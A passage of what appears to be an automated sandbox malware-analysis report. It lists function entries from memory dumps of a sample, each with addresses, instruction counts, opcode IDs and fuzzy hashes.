                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d1fb937d8b5e0fe7fa8cb0dae8210f47d47bb70c9648d6426fb28b91a6709a7
                                              • Instruction ID: f5ee67cced4ab76016bc896b81203871643208b9d86136e65dd737be58c6402c
                                              • Opcode Fuzzy Hash: 3d1fb937d8b5e0fe7fa8cb0dae8210f47d47bb70c9648d6426fb28b91a6709a7
                                              • Instruction Fuzzy Hash: 8951C2317012048FC7559F69D894AEEBBF6EF89200F1444AED059EB3A1CB75EC45CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C8438 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32956150303e36a228d84b273ec05cf9818c8d80e94c7069ed0434391f93d13b
                                              • Instruction ID: d647edbf3603d53725deeccf236e18f42633c919f7f451a3b9c9cb5b8dbb35ee
                                              • Opcode Fuzzy Hash: 32956150303e36a228d84b273ec05cf9818c8d80e94c7069ed0434391f93d13b
                                              • Instruction Fuzzy Hash: 774180357046448FC759AF38D85066EBBE3AF86300B2486BED586CB3A2DA35DC06C756
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C8054 Relevance: .1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ebf472fcd4be16eff450c8c3339ae2f50999c894474524970693d1e9d0529ca8
                                              • Instruction ID: 1437255cca6451bbca492268f0bbcc7c8b4550d30cef25ce35c198079ee199e8
                                              • Opcode Fuzzy Hash: ebf472fcd4be16eff450c8c3339ae2f50999c894474524970693d1e9d0529ca8
                                              • Instruction Fuzzy Hash: 42415F347406058FDB689F69C494BAEBAE7FF84702F10456DD1468B3A0CB75A846CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C97E9 Relevance: .1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dca1c66460af35b1bc8f11b0f986b87e3fe63bfa1df6ac8d3e853193cb365233
                                              • Instruction ID: d3da05b4fd7d701a2df6faa5c1bf393086112bdf5ff76563e474d444d3bca8bc
                                              • Opcode Fuzzy Hash: dca1c66460af35b1bc8f11b0f986b87e3fe63bfa1df6ac8d3e853193cb365233
                                              • Instruction Fuzzy Hash: C3417134700605CFDB659F29C894BAEBBF7BF85702F14456DD1468B3A1CB71A84ACB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CBF4A Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82161a88a53b4b1e48a235324937a1657ed1edf723cbe3fa439b22ae06a52cfc
                                              • Instruction ID: 31b22e434ec37bc749d0096a93b660fa4c6e6f0f2e902d340b9d50630f301a5c
                                              • Opcode Fuzzy Hash: 82161a88a53b4b1e48a235324937a1657ed1edf723cbe3fa439b22ae06a52cfc
                                              • Instruction Fuzzy Hash: E7315A757006108FCB69AF38D45866D7BE6FF89312B14466DE05AC73A1DF34D902CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CBF50 Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 299eb36d189a1425c490da16cf81b678afabb0257078f7a7c00354f1af2b3090
                                              • Instruction ID: 259847aa2536fc5cee1e139be67b3214fcf497399db573086869d843ad316086
                                              • Opcode Fuzzy Hash: 299eb36d189a1425c490da16cf81b678afabb0257078f7a7c00354f1af2b3090
                                              • Instruction Fuzzy Hash: 7C313734700A148FCB69AF38D45866E7BE6EF89712B14466DE05AC73A1DF34E902CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C94B4 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c385b4758997a0029ba413dfcb3db7326d47e49040a15dc831195afcf89c282b
                                              • Instruction ID: fcb9d1d658b9f14778a11c2d1e1ffb47931562e2937a82d7b99176ae8ef28adf
                                              • Opcode Fuzzy Hash: c385b4758997a0029ba413dfcb3db7326d47e49040a15dc831195afcf89c282b
                                              • Instruction Fuzzy Hash: 8231E5743106148FDB58DF29C884B6E77FABF88615F1585ADE446CB261DB34E841CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CEC48 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15a1a4150119661ba4e2852e60c22a0dddace1898280907800b19b96caebac61
                                              • Instruction ID: cdb8657f10ea6bcf3e041a7087b70be2a7ed7223ffe9b33dbc0dcb5f244c22a8
                                              • Opcode Fuzzy Hash: 15a1a4150119661ba4e2852e60c22a0dddace1898280907800b19b96caebac61
                                              • Instruction Fuzzy Hash: 633168357002159FCB14CF68C884AADBBB6FF48321B2542AAE525DB3B1CB71DC02CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CEC58 Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b455a904b4f614c4e2cbf2fe83c00ed9c5b3367c1ff8b81032cf08c5837cff7
                                              • Instruction ID: 1a5d240ec29103e191debfc1167f7605e59f6db60e7eb5b4cfe70ec003a8c721
                                              • Opcode Fuzzy Hash: 9b455a904b4f614c4e2cbf2fe83c00ed9c5b3367c1ff8b81032cf08c5837cff7
                                              • Instruction Fuzzy Hash: 3A3108357002159FCB549F68C884A6EBBB6FF88721B2146A9E5259B3B1CB71DD02CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CA671 Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5639102e162470d9c9dbd841a217f94ea5d059196056526a692a389538e015e
                                              • Instruction ID: 46ac091513508e06c733d18cd89c3346d7c898ded2e1cb5df9eb9f2b8b1fbf89
                                              • Opcode Fuzzy Hash: f5639102e162470d9c9dbd841a217f94ea5d059196056526a692a389538e015e
                                              • Instruction Fuzzy Hash: ED3135743106148FCB95DF29C844BAA7BF6BF88615F1585AEE48ACB271DB34E842CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774B5CF Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91157283ab2b65b68c0ca74e9587f0a6d3cc7f7d880a31dc07110d222811b378
                                              • Instruction ID: 47d56f3ca5c443f346b447394da1c1c402449dbb03fa06b189560f254adb9f48
                                              • Opcode Fuzzy Hash: 91157283ab2b65b68c0ca74e9587f0a6d3cc7f7d880a31dc07110d222811b378
                                              • Instruction Fuzzy Hash: F5213871B142118FCB02BBB8E9D866EBBBAEF88214F4049A6D409D3359CF389C05C351
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CBF24 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97484fa20a67027e7e3311a36dd380b48c16c44dd416df83acb56c61ef5dce94
                                              • Instruction ID: 0353e42e711bbf5d4e5cdc7e7bb0c68f13935caae35323b0284e14fff2860f60
                                              • Opcode Fuzzy Hash: 97484fa20a67027e7e3311a36dd380b48c16c44dd416df83acb56c61ef5dce94
                                              • Instruction Fuzzy Hash: 4D315030600600CFC7A49F28C888B5A77E6FF81325F55857DE85A8B2B1DF70E88ACB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CB360 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97f15d4b510e79420943b6adcac75d5280bc865a97222660e69ae8e11c1822ce
                                              • Instruction ID: f3ff9da37958739f5966b2887104e3719d6007d4dedd194ecd484015574dbc04
                                              • Opcode Fuzzy Hash: 97f15d4b510e79420943b6adcac75d5280bc865a97222660e69ae8e11c1822ce
                                              • Instruction Fuzzy Hash: A72183357846128F4B996F3D957A53E3AE7DFC46A2318002ED906C7394EE24CC4287A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C3B60 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7dcec24f44085b12cf0527b81484b8ca601a09357160023363caf44592a02ad3
                                              • Instruction ID: 44a135189e938fce6ddaa2b1d7763f1b1f9ad159ece22617764571c9fb00b8fd
                                              • Opcode Fuzzy Hash: 7dcec24f44085b12cf0527b81484b8ca601a09357160023363caf44592a02ad3
                                              • Instruction Fuzzy Hash: F6315234A102599FDF60DF68C894BEE7BF2BF49702F1544ACD444AB392C7759842DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C8428 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62dd59ae6d87e23544a9a1a6adc9026e82806f57c99b588cccb23d612a25222
                                              • Instruction ID: 2bd8f7caa5c2d8c36ad7a31078209e1df057ffa5bb753ff7624f1f39c1363775
                                              • Opcode Fuzzy Hash: c62dd59ae6d87e23544a9a1a6adc9026e82806f57c99b588cccb23d612a25222
                                              • Instruction Fuzzy Hash: 3221DD347006048FC768EF38C8809AABBF3EF89201B20897DD5458B3A1DB71EC06CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CB025 Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 485b66ed5033dcb1d531a2f75de8dfecc2986b1261bb87d9b57a294c30ee4077
                                              • Instruction ID: f4e0e2f34ebdd6216469e6add58d205a623a211777242e703058fd3449522b66
                                              • Opcode Fuzzy Hash: 485b66ed5033dcb1d531a2f75de8dfecc2986b1261bb87d9b57a294c30ee4077
                                              • Instruction Fuzzy Hash: 25312934640209CFCB54DF68D5A5A9EBBF6EF88362F24446CD815AB2A1DB31DD41CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CA811 Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20af5d296accb7212e3a486e79b2af8ed163d6da3b7c528dc66fa84ee1b047a3
                                              • Instruction ID: aae9d06025490ba9ca95111169b6412a853a249805ed3d925546bd2c6e862b0c
                                              • Opcode Fuzzy Hash: 20af5d296accb7212e3a486e79b2af8ed163d6da3b7c528dc66fa84ee1b047a3
                                              • Instruction Fuzzy Hash: 2C312C302406058FC799DF28D858BA97BE6FF85311F5584ADE08ACB261DF74AC4ACB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CF9E8 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f299dd8ad12032a904d14433a2bd57564cdc07844f62626acad642f32d4d514e
                                              • Instruction ID: e4d14f1c2f31b020f52eb08516d68c57b5e6b34f9234d95e48b4120f6ecf643d
                                              • Opcode Fuzzy Hash: f299dd8ad12032a904d14433a2bd57564cdc07844f62626acad642f32d4d514e
                                              • Instruction Fuzzy Hash: 8F21AE7420074ACBC724EF35C8908AEB7B7BF822467104A7DF85A46290DB76E946CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00BCD4CC Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2734489378.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_bcd000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ea233a0d1fc9ceb30cd9d009543325dd259180ded87bf4da7fa4e479ae4b262
                                              • Instruction ID: 09b23cd03c13da344386af1d3bda6297dd23141afc4dc0df466ba3c1fe463b07
                                              • Opcode Fuzzy Hash: 6ea233a0d1fc9ceb30cd9d009543325dd259180ded87bf4da7fa4e479ae4b262
                                              • Instruction Fuzzy Hash: 4D2103B9604204DFDB05DF14D9C0F26BFA5FBA8318F2085BDE9090A256C33AD816DAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774B5E0 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 343c7a38f93dea139679f44ee264e01754ac677f9217f1c95027e72a12051e3d
                                              • Instruction ID: 54197345fc181f4d64fc7b128ef8740b9e4c0728da44c24d32b14f8311156340
                                              • Opcode Fuzzy Hash: 343c7a38f93dea139679f44ee264e01754ac677f9217f1c95027e72a12051e3d
                                              • Instruction Fuzzy Hash: C2117571B102118BC705B7BDE9D9A6EB7AAEF88254F804569D409D3358DF38AC14C395
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C94FC Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9da639d3ce016afa79a30fa771f5e1f86bea90535ad4d1a7cdce397eac971f3
                                              • Instruction ID: d5efce31dc4af17f376a5ffb4acf3d6c9110877293406d775c067d66aa30564c
                                              • Opcode Fuzzy Hash: d9da639d3ce016afa79a30fa771f5e1f86bea90535ad4d1a7cdce397eac971f3
                                              • Instruction Fuzzy Hash: D83149302406058FC7989F28D888BAA77E6FF84311F5585ADE15ACB2A1DF70AC4ACB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00BDD01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2734562182.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_bdd000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a35d0dd9c58e9cd3483473355e019b107697d9d3204e6a299940ad1dee0b0735
                                              • Instruction ID: 5f80942277ab22a1f92c84248a37dc78a3c41e93c11d253de46fd335a1d16017
                                              • Opcode Fuzzy Hash: a35d0dd9c58e9cd3483473355e019b107697d9d3204e6a299940ad1dee0b0735
                                              • Instruction Fuzzy Hash: F521D075604204DFCB14DF24D9D4B26FBA5EB88314F24C5AAD98A4B396D33AD806CAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00BDD1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2734562182.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_bdd000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d85c85e61bea8837c7cb383a964477d0ea89d72fd8db7893f995d0f400d3a6aa
                                              • Instruction ID: 8d76053d66dbfdc95ab9bac49d1964a19456aaefb87836daf7f0a1310e0a38da
                                              • Opcode Fuzzy Hash: d85c85e61bea8837c7cb383a964477d0ea89d72fd8db7893f995d0f400d3a6aa
                                              • Instruction Fuzzy Hash: F121F271644204EFDB05DF64D9C0F26FBA5FB88314F20C5AEE9894B396D33AD806CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CB34F Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 314c456f5c23808d92d33031fd4c883aac3e8c543013b333524593d3515180d0
                                              • Instruction ID: 4706ac6cfd8cab73861a240340828f7320ee7c62e8ea0bec75681fac21599c97
                                              • Opcode Fuzzy Hash: 314c456f5c23808d92d33031fd4c883aac3e8c543013b333524593d3515180d0
                                              • Instruction Fuzzy Hash: 5411DD353842018F8B592F38956557E3BE7DFC56A3319005EE906C7391DF24CD42C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CF9DA Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a6290b28613cf314b5cc4446523451246b1984975fbf5552a57f92b516df20d
                                              • Instruction ID: fd063311a280a02882a54640f08d8caa7818d528d8c91d40dbf1b98e950d062e
                                              • Opcode Fuzzy Hash: 7a6290b28613cf314b5cc4446523451246b1984975fbf5552a57f92b516df20d
                                              • Instruction Fuzzy Hash: 5421073010434ACFCB21DF35C8504AEBBF7BF422027044A7EF89696291DB75D956CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C8074 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd9e1361a1a62c42fef860ad3ccb92d5f52b3c23c991f04e61149cb0ac624924
                                              • Instruction ID: ba08617b4b07e72f7b9d1638883dec58e70a50d1559b7f92e2be9de9c6461609
                                              • Opcode Fuzzy Hash: bd9e1361a1a62c42fef860ad3ccb92d5f52b3c23c991f04e61149cb0ac624924
                                              • Instruction Fuzzy Hash: 30117C367006588FC724AF38D9948AEBBB6EF96212710456EE006CB371DA31D885CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C3AA7 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9eeb839797ff37634ae8d2a52daafb63c103d04f75cbf25bfbc7132e1730b48
                                              • Instruction ID: 62492fd70d06fe9281d4b67830539a5602a64a40f212fda00d851bf02bf8782e
                                              • Opcode Fuzzy Hash: d9eeb839797ff37634ae8d2a52daafb63c103d04f75cbf25bfbc7132e1730b48
                                              • Instruction Fuzzy Hash: D41100303003009FD725DB28C890BAA77E7EF84311F55C8AEE2858B385CB7498468750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CA5B8 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46e9f0b4831ca82b92a298f417cd9f9bdc5c7da62fa80bbdeda8195bf3aafae9
                                              • Instruction ID: af372735a94f594a77a3a5523ba15f971e0b8d1b01634fe340f9d46a6f0e0283
                                              • Opcode Fuzzy Hash: 46e9f0b4831ca82b92a298f417cd9f9bdc5c7da62fa80bbdeda8195bf3aafae9
                                              • Instruction Fuzzy Hash: 5011D076304698CFCB299F38D5508AD7BF3EF8221231485AED085CB662DA31D882C710
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774B58F Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 115549afba828e83203c7d01e7a98770c416d13f88b1077c81aeeaa9cbd3caad
                                              • Instruction ID: 17c5af74a0d0458e54854ddbb83a2b281c3a0abf2281cbf0ac61a76dd0af7908
                                              • Opcode Fuzzy Hash: 115549afba828e83203c7d01e7a98770c416d13f88b1077c81aeeaa9cbd3caad
                                              • Instruction Fuzzy Hash: C51106B1B041118BCB05BBB8E98966EB7B5FF88294F8049AAD019D3358DF38DC15C785
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00BDD005 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2734562182.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_bdd000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 873562e31c2691b2300e8d77cb04283a1e40d1765e2069ce503dcb35544c0fba
                                              • Instruction ID: 7214868f65f6704246760ec64be48bec322cb585042679d934a83100a7006d89
                                              • Opcode Fuzzy Hash: 873562e31c2691b2300e8d77cb04283a1e40d1765e2069ce503dcb35544c0fba
                                              • Instruction Fuzzy Hash: B52195755093808FCB12CF24D594715FF71EB45314F28C5DBD8898B697C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C3AB8 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f80ba1690e6dae05e8aaaa55e09a6d3c91e129bf6fb9ed238fe96496c4c7c4f
                                              • Instruction ID: ca9508eca9e742d811fcef4f58c74f024360b58994b1bdf8da4f03b255bd1680
                                              • Opcode Fuzzy Hash: 7f80ba1690e6dae05e8aaaa55e09a6d3c91e129bf6fb9ed238fe96496c4c7c4f
                                              • Instruction Fuzzy Hash: B8119E303102009BE768EB69D891B6A77D7EBC4311F55C56DE60987384CB75E8428790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CCB60 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b1fe54869f70fe3a898a66284dd080de807204bd1de995c59fd2dffee59f3d9
